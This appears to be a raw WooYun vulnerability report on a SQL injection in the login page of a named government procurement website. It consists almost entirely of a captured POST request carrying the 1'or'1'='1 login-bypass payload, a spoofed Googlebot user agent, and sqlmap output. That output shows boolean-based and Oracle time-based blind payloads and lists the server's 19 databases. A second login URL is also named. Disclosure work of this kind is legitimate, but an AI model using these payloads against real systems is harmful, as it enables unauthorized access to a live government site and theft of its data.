WooYun.org

http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp

POST /net/center/stocklogin.jsp HTTP/1.1
Host: www.shzfcg.gov.cn:8090
Proxy-Connection: keep-alive
Content-Length: 96
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.shzfcg.gov.cn:8090
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=52QKJDLQlqvdZ2kwJhJPLhVdhc7YSGhr5lT91KncHQhpk2cyZqRf!648548179
operator_name=1%27or%271%27%3D%271&operator_pwd=1%27or%271%27%3D%271&opstatus=login&screenwidth=

sqlmap identified the following injection points with a total of 265 HTTP(s) requests:
---
Parameter: operator_pwd (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 3559=3559 AND 'hDvf'='hDvf&opstatus=login&screenwidth=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 4645=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(99)||CHR(122)||CHR(108),5) AND 'dQJJ'='dQJJ&opstatus=login&screenwidth=
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
available databases [19]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] ITCDQ2
[*] JK
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SHTEST
[*] SHZFCG
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

http://www.shzfcg.gov.cn:8090/login/login_quxian.jsp